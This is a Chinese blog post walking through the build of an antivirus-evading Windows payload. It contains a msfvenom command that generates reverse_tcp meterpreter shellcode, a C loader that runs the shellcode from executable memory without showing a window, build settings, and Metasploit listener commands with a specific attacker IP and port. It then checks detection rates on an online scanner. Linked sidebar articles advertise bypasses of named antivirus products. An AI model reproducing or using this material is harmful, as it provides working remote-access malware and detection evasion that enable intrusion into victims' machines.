exe免杀c语言,实验使用 C 编译 shellcode 免杀上线

最新推荐文章于 2024-07-23 14:38:11 发布
最新推荐文章于 2024-07-23 14:38:11 发布
阅读量619 收藏 3
点赞数
文章标签: exe免杀c语言

实验了一下这篇文章里面介绍的免杀方法:[使用 C 编译 shellcode 免杀上线](https://www.xljtj.com/archives/c-shellcode.html?from=timeline&isappinstalled=0)。这篇文章已经把步骤写的很清楚了,但是我会在本文中也记录清楚每一步,因为文章可能说没就没,记下来自己留个备份。顺便记下我遇到的几个mini tiny坑。

# 0x01 环境

- Vs 2019

- windows 10

- kali

# 0x02 msf 生成 shellcode

```

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机器IP(MSF的反弹IP) LPORT=攻击机器端口(MSF的反弹端口) -f c > shellcode.c

```

![title](https://leanote.com/api/file/getImage?fileId=5e9bab12ab64410e3d0012f8)

# 0x03 用 VS 生成可执行文件

这里有两个很小的点:

因为我和作者VS版本和目标环境的区别,第一,我在VS 2019里生成`控制台应用`的时候,是默认不带头文件的。所以在生成程序中,没有`pch.h`这个头文件。解决方法很简单,直接把`#include "pch.h"`这一句代码删掉就好。

![title](https://leanote.com/api/file/getImage?fileId=5e9baea9ab6441104c0012ee)

![title](https://leanote.com/api/file/getImage?fileId=5e9baf14ab64410e3d0013cd)

第二,如绿框中的`代码生成`→`运行库`选项及编译配置:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb680ab64410e3d00152f)

如果我这么选,注意这里编译配置是`Debug x86`,那我可以成功生成exe,但是在运行的时候无法成功执行,目标机器上报错如下:

![title](https://leanote.com/api/file/getImage?fileId=5e9bafdeab64410e3d0013f9)

![title](https://leanote.com/api/file/getImage?fileId=5e9bafe6ab6441104c001324)

解决办法也不难:

- 项目`属性`→`代码生成`→`运行库`选 **多线程(/MT)**

- 编译配置选 `Release x86`

![title](https://leanote.com/api/file/getImage?fileId=5e9bb02eab6441104c001332)

------------

具体操作如下:

打开 vs2019,新建项目→`控制台应用(C++)`。

然后把 shellcode 复制到下面的代码里(我删掉了不存在的头):

```

// MSF.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。

#include

#include "stdio.h"

#include "Windows.h"

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //去除窗口

//步骤b所在桌面产生的 shellcode.c的内容;

unsigned char shellcode[] =

void main()

{

//ShellExecute(NULL, _T("open"), _T("explorer.exe"), _T("https://www.baiud.com"), NULL, SW_SHOW);

LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

memcpy(Memory, shellcode, sizeof(shellcode));

((void(*)())Memory)();

}

```

再把 shellcode 全选复制到编辑器的代码框里:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb192ab64410e3d001446)

修改编译配置为:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb1dbab6441104c001388)

修改属性:项目里右键属性 → C/C++ → 代码生成 → 运行库:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb1b7ab64410e3d001450)

保存之后,`重新生成解决方案`,就会生成一个 exe,这个 exe 运行即可上线:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb240ab64410e3d001466)

这里按原作者的编译和运行库配置(`Debug x86 多线程测试(/MTd)`)生成的文件大小是38.5k,按我的配置生成的文件大小是79.0k。

# 0x04 测试上线

MSF 里开启监听:

```

use exploits/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.113.131

set lport 8090

run

```

执行 exe 即刻上线:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb3deab6441104c0013e7)

# 0x05 免杀性检验

查杀网查杀地址:[MSF(2).exe](https://r.virscan.org/language/zh-cn/report/aab7bc6beead5b681de1f59563456e89)

看上去还行:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb498ab64410e3d0014d6)

# 0x06 CS 上线

我也懒得搞了,两个端起起来有点麻烦:

> 如果要用 CS 上线,如下生成 payload:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb516ab6441104c00141f)

后面操作是一样的。

--------------

# 参考链接:

1. [使用 C 编译 shellcode 免杀上线](https://www.xljtj.com/archives/c-shellcode.html?from=timeline&isappinstalled=0),心灵鸡汤君's blog,心灵鸡汤君,2020 年 04 月 18 日

weixin_39540018
关注
【护网必备】Windows平台shellcode免杀加载器
Fly_鹏程万里
06-14 334
bypass:McAfee、金山(数字签名)、火绒、ESET、卡巴企业版(时间5s 抖动50 Sleep_mask)、360全家桶(物理机)、Norton(加白程序资源)、WDF(PC)、WDF(Server)、Symantec(加白程序资源)bypass:金山(数字签名)、火绒、ESET、360全家桶(物理机)、WDF(PC)、WDF(服务器提示复查(关云保护))、McAfee、Norton(加白程序资源)、卡巴企业版(时间5s 抖动50 Sleep_mask)必须使用Bof操作,shell运行就掉线。
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1268
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode
c语言免杀,cs免杀
weixin_42306938的博客
05-22 920
思路①利用c语言+veil实现免杀#include "pch.h"//可以删除#include #include #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\...
shellcode免杀C语言三条指令免杀360!你还困吗?
HUYA69的博客
09-07 1812
shellcode免杀(1)C语言三条指令免杀360 ✉1 简介 描述有错的地方各位师傅海涵。 经过一下午的C语言测试,得出了十多种过360的·方法,这里拿三种c的方式过360(思路大体相同),还有一个c++的免杀360和火绒都可以过等有时间都可以跟大家更新。 ✉2 免杀过程 废话就不多讲了对于初学者友好发展,先看一遍制作过程,我们准备好msf和cs的shllecode msfvenom -p windows/meterpreter/reverse_tcp LHOST="自...
【网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Button12138的博客
07-23 754
小七免杀工具包里有很多的工具我就列出其中的一些常用的排名不分前后1、mycclMyccl作为05出品的一款定位工具,到现在还是独领风骚,实用性五星,稳定性五星。2、C32asm一款非常好的静态反汇编工具一般人免杀定位出特征码后都会先到C32里面去改,如果不行就载入od。当然,源码免杀就直接看定位出的东西在源码所对应的代码修改就ok。3、OD作为一款神器,OD有很多作用,破解,免杀啊,都需要它,做免杀不必要学汇编,通读几遍80×86就差不多了4、LordPE。
c语言免杀火绒
记录学习,一起进步
11-18 746
c语言随机数异或加密免杀
c语言免杀程序源码,[原创]Window下基于C/C++源码免杀理论及思路(新手篇)
weixin_39531604的博客
05-18 905
作者:冷锋(LengF) –[BHST]博客:www.81sec.com 时间:2011-5-220x00 概述最近搞一个国外的网站,对方是用的赛门铁克的诺顿杀毒软件,而内网又只对外开放了80端口,于是就想着传个端口转发或者端口复用的工具上去,可是一上传就没了。既然已经提权了,又不想轻易放弃这台服务器。于是就想着怎么办了。自己对非源码的免杀不熟悉,于是就想到自己手头有类似于LCX的工具c...
使用shellcode打造MSF免杀payload及shellcode加载技术
jackey3Lin的专栏
10-21 5493
0x00 前言      经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。  0x01 从哪里开始      shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse
杀毒与免杀技术详解---白嫖党福音
01-15 1826
0x01 简介 不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到杀软waf这些大敌,当然主要还是杀软,因此我们不得不考虑免杀进而实现我们渗透测试目的。 0x02 概念 2.1 免杀类别 简单总结下我知道的免杀类别: 一句话木马绕狗(我觉得他不应该出现在这里,但为了致敬我学习的第一个免杀,把他放了出来) 文件不落地 shellcode加密 修改源码增加花指令 DLL加载 自定义加载器 指定特定的运行方式 加壳 当然还可以按照大的类别划分 静态扫描免杀
红队培训班作业 | 免杀过360和火绒 四种方法大对比
Ms08067安全实验室
08-16 2951
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
ShellCode的几种调用方法
weixin_30326515的博客
08-31 388
ShellCode是一种漏洞代码,中文名也叫填充数据,一般是用C语言或者汇编编写。在研究的过程中,自己也学到了一些东西,发现其中也有许多坑,所以贴出来,如果大家有碰到的,可以参考一下。 以启动电脑上的计算器为例,编写ShellCode其实就是两部分,一是获取ShellCode字节码,二是调用它。 获取方式一般是观察代码反汇编和内存相结合: VOID Test() { H...
28.远控免杀专题(28)-C、C++加载shellcode免杀(下)(VT免杀率3-71)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
c语言免杀程序源码,ghost源码免杀教程 步
weixin_39605647的博客
05-18 1001
远控软件gh0st源码免杀2010-12-13 14:57远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控***,既然要利用,我们就做好源码基础上的***免杀工作。好久没有来博客了,我把免杀这部分整理了一下,先抛一砖头,有兴趣的朋友可以接着做,也可以和本人交流。序gh0st远控软件采用驱动级RESSDT过主动,svchost参数启动...
c语言免杀程序源码,【程序源码】用纯C语言实现坦克大战
weixin_30663839的博客
05-18 227
/* time:2017/1/15 *//* edit:www.dotcpp.com */#include#include#include#include#include#define KEY_ESC 0x01#define KEY_SPACE 0x39#define KEY_UP 0x48#define KEY_LEFT 0x4b#define KEY_RIGHT 0x4d#define KEY...
c语言免杀花指令大全,免杀花指令
weixin_36219745的博客
05-18 894
今天送上经典花指令注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果.push ebppop ebppush eaxpop eaxpush esppop esppush 0push 0push 10 -------其中数字可以任意,注意与下面对应push -10nop -----------可任意在中间添加与它等效的:mov EDI,EDIadd esp,1 -------其中数字可...
远控免杀从入门到实践(3)-代码篇-C/C++
weixin_46236101的博客
03-13 1925
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实.
免杀基本知识,shellcode混淆免杀
白帽子凯哥聊黑客
06-17 1312
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
C实现分离免杀
春日野穹
02-28 2433
前期准备 1.编译好mian.exe,源码如下 #include <stdio.h> #include <windows.h> int main(int argc,char* argv[]) { //打开要执行的ShellCode文件 HANDLE hFile = CreateFileA("payload.bin", GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL); if (hFile==INVALID_HANDLE_VALUE)
C加载器免杀尝试(免杀)
哆啦安全
11-21 1000
干货|免杀-C加载器免杀尝试 哆啦安全|知识星球上线啦(优惠券活动即将到期)!!! 微信公众号
ShellCode免杀技术解析与C语言Payload实践
" ShellCode免杀技术的探讨与实践" ShellCode免杀的骚姿势文档主要讨论了在网络安全领域中如何避免ShellCode被反病毒软件检测和清除的技术策略。ShellCode通常是一段用机器语言编写的代码,设计用来利用软件漏洞以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值